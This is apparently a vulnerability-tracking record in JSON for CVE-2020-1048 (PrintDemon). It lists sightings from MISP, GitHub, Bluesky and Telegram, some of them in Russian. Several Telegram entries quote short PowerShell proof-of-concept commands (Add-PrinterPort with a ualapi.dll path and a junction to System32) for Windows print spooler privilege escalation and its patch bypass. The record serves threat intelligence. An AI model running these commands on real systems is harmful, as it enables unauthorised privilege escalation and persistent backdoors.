{"vulnerability": "CVE-2020-1048", "sightings": [{"uuid": "cce66b32-8e2e-438c-bbf9-aa679d07a050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lztuw2t7bw2p", "content": "", "creation_timestamp": "2025-09-27T21:02:25.277439Z"}, {"uuid": "9266ef50-3820-47df-a929-53ba008e042f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "6abaee8c-4ea9-4544-b640-83e29a50f090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:20.000000Z"}, {"uuid": "76ec30ad-d43a-484f-a4e3-7ea8e77558e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://gist.github.com/shashinma/7b2884d4bf5d8970546bb8a8edb6d41b", "content": "", "creation_timestamp": "2025-02-12T12:54:54.000000Z"}, {"uuid": "5ab16360-e7fe-47f5-a077-815d364036c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "Telegram/rLwJW8Sxt7uWsdYlvaJmmjpBkh3NAlLwTD4aRP5kjpBY5_E", "content": "", "creation_timestamp": "2025-06-23T21:00:07.000000Z"}, {"uuid": "0e431ee6-12e7-48b8-a131-cafb52353fcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb", "content": "", "creation_timestamp": "2020-09-17T21:18:07.000000Z"}, {"uuid": "9c0d8260-8fec-4d74-8cfb-11032b1aee0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1791", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon) with a TOCTOU.\n\nPoC:\nmkdir C:\\test\nAdd-PrinterPort -Name c:\\test\\ualapi.dll\nNew-Item -Type Junction -Path C:\\test -Value C:\\Windows\\System32\n\nhttps://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", "creation_timestamp": "2020-08-11T20:41:51.000000Z"}, {"uuid": "0d8490ca-62f2-41b1-aa8b-8c297b2f909b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "https://t.me/mis_team/160", "content": "\u0417\u0430\u043c\u0435\u0442\u043a\u0438 \u043d\u0430 \u043f\u043e\u043b\u044f\u0445:\u00a0PrintDemon\n\n\u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u044d\u0442\u043e\u0442 \u0432\u0442\u043e\u0440\u043d\u0438\u043a \u0432\u044b\u0448\u0435\u043b \u043f\u0430\u0442\u0447 \u043e\u0442\u00a0Microsoft, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043a\u0440\u044b\u043b \u043e\u0447\u0435\u043d\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c - \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u043b\u0443\u0436\u0431\u0443 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 (CVE-2020-1048). \u0414\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421\u00a0Windows\u00a0- \u043e\u0442 \u0441\u0430\u043c\u044b\u0445 \u0441\u0442\u0430\u0440\u044b\u0445 \u0434\u043e \u0441\u0430\u043c\u044b\u0445 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445.\n\n\u0414\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e:\n\n1. \u0411\u044b\u0442\u044c \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0435\u043d\u044b\u043c \u043f\u043e\u0434 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435\n\n2. \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u00a0PowerShell\u00a0\u043e\u0434\u043d\u0443 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443\n\nAdd-PrinterPort -Name C:\\windows\\system32\\ualapi.dll\n\n\u041f\u0440\u0438\u0447\u0435\u043c, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0432 \u0442\u0430\u043a\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u043d\u0435\u0437\u0430\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u0432\u043e\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u0430\u043a \u0438 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u043e\u0441\u043b\u0435 \u0435\u0435 \u043f\u0430\u0442\u0447\u0430 (\u0440\u0430\u043d\u0435\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u043e\u0440\u0442\u044b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442).\n\n\u0410 \u0441 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439, \u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u0432\u0441\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043f\u0430\u0442\u0447 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e, \u043d\u0430\u0445\u043e\u0434\u044f\u0441\u044c \u043d\u0435 \u0432 \u043e\u0444\u0438\u0441\u0435 - \u0442\u0430\u043a\u043e\u0433\u043e \u0440\u043e\u0434\u0430 \u0431\u0430\u0433 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0432 \u0434\u043b\u0438\u043d\u043d\u043e\u043c \u043f\u043e\u0441\u0442\u0435 \u043e \u0432\u0441\u0435\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u044f\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438:\n\nhttps://windows-internals.com/printdemon-cve-2020-1048/", "creation_timestamp": "2020-05-14T10:01:29.000000Z"}, {"uuid": "c72ef3dd-c0bf-4cf7-a96d-c864e8d5c3f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "https://t.me/hybgl/209", "content": "#article #cve #windows #privesc #spooler\n\n[ \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0440\u0430\u0441\u043a\u0430\u0437 \u043f\u0440\u043e cve-2020-1048 ]\n\nhttps://windows-internals.com/printdemon-cve-2020-1048/", "creation_timestamp": "2020-05-13T22:58:05.000000Z"}, {"uuid": "5b98813b-1bb1-4610-a126-1749164377cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://t.me/proxy_bar/748", "content": "Windows Privilege Escalation: SpoolFool\n\u041f\u0430\u0442\u0447\u0438\u043b\u0438, \u0444\u0438\u043a\u0441\u0438\u043b\u0438  CVE-2020-1048 \u0438  CVE-2020-1337, \u0430 \u0434\u044b\u0440\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c.\n\u041e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-21999 (\u00abSpoolFool\u00bb) \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0430 NT AUTHORITY\\\\SYSTEM. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u044b 2 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 \u0430\u0442\u0430\u043a\u0438. \n\u041a\u0430\u043a \u043f\u0440\u043e\u043b\u0435\u0437\u0442\u044c \u0432 \u043c\u0438\u0440 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u043e\u0432 \u0431\u0435\u0437 \u0432\u0430\u0437\u0435\u043b\u0438\u043d\u0430, \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u0442 \u0440\u0430\u0441\u043e\u0432\u043e \u0432\u0435\u0440\u043d\u044b\u0439 \u0438\u043d\u0434\u0443\u0441 Harshit Rajpal\n\u0427\u0438\u0442\u0430\u0435\u043c \u0442\u0443\u0442.\n#windows #LPE", "creation_timestamp": "2022-03-25T16:36:11.000000Z"}, {"uuid": "c1e06595-2bcb-4daf-820f-d07677f289a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://t.me/reverse_dungeon/1515", "content": "Windows Privilege Escalation: SpoolFool\n\u041f\u0430\u0442\u0447\u0438\u043b\u0438, \u0444\u0438\u043a\u0441\u0438\u043b\u0438  CVE-2020-1048 \u0438  CVE-2020-1337, \u0430 \u0434\u044b\u0440\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c.\n\u041e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-21999 (\u00abSpoolFool\u00bb) \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0430 NT AUTHORITY\\\\SYSTEM. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u044b 2 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 \u0430\u0442\u0430\u043a\u0438. \n\u041a\u0430\u043a \u043f\u0440\u043e\u043b\u0435\u0437\u0442\u044c \u0432 \u043c\u0438\u0440 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u043e\u0432 \u0431\u0435\u0437 \u0432\u0430\u0437\u0435\u043b\u0438\u043d\u0430, \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u0442 \u0440\u0430\u0441\u043e\u0432\u043e \u0432\u0435\u0440\u043d\u044b\u0439 \u0438\u043d\u0434\u0443\u0441 Harshit Rajpal\n\u0427\u0438\u0442\u0430\u0435\u043c \u0442\u0443\u0442.\n#windows #LPE", "creation_timestamp": "2022-03-25T16:16:29.000000Z"}, {"uuid": "e2af625c-090c-4de3-ab74-5fb9b150e155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1120", "content": "#Threat_Research\n\"PrintDemon: Print Spooler Privilege Escalation, Persistence &amp; Stealth\" (CVE-2020-1048 &amp; more)\nhttps://windows-internals.com/printdemon-cve-2020-1048\n]-&gt; PrintDemon PoC:\nhttps://github.com/ionescu007/PrintDemon", "creation_timestamp": "2024-10-23T16:59:36.000000Z"}, {"uuid": "e69ecd13-6a62-47ec-b105-eefee79966f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1571", "content": "CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon)\nwith a bypass of PrintDemon\u2019s recent patch via a Junction Directory (TOCTOU)\nPoC:\nmkdir C:\\test\nAdd-PrinterPort -Name c:\\test\\ualapi.dll\nNew-Item -Type Junction -Path C:\\test -Value C:\\Windows\\System32\n1. https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/\n2. https://www.zerodayinitiative.com/blog/2020/8/11/windows-print-spooler-patch-bypass-re-enables-persistent-backdoor", "creation_timestamp": "2020-08-12T11:03:01.000000Z"}, {"uuid": "312fc184-14ee-40ab-859b-ad60f97c9226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1048", "type": "seen", "source": "https://t.me/SecLabNews/8336", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438\u00a0\u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0430\u0442\u0447, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Microsoft \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (\u00a0CVE-2020-1048\u00a0) \u0432 \u0441\u043b\u0443\u0436\u0431\u0430\u0445 \u043f\u0435\u0447\u0430\u0442\u0438 Windows, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438 \u041f\u0435\u043b\u0435\u0433\u043e\u043c \u0425\u0430\u0434\u0430\u0440\u043e\u043c (Peleg Hadar) \u0438 \u0422\u043e\u043c\u0435\u0440\u043e\u043c \u0411\u0430\u0440\u043e\u043c (Tomer Bar) \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 SafeBreach Labs. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 Windows, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c \u043f\u0435\u0447\u0430\u0442\u0438. \u041e\u0431\u0445\u043e\u0434 \u044d\u0442\u043e\u0439 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d \u043a\u0430\u043a \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 (CVE-2020-1337)\n\n\nhttps://www.securitylab.ru/news/510910.php", "creation_timestamp": "2020-08-13T19:18:01.000000Z"}]}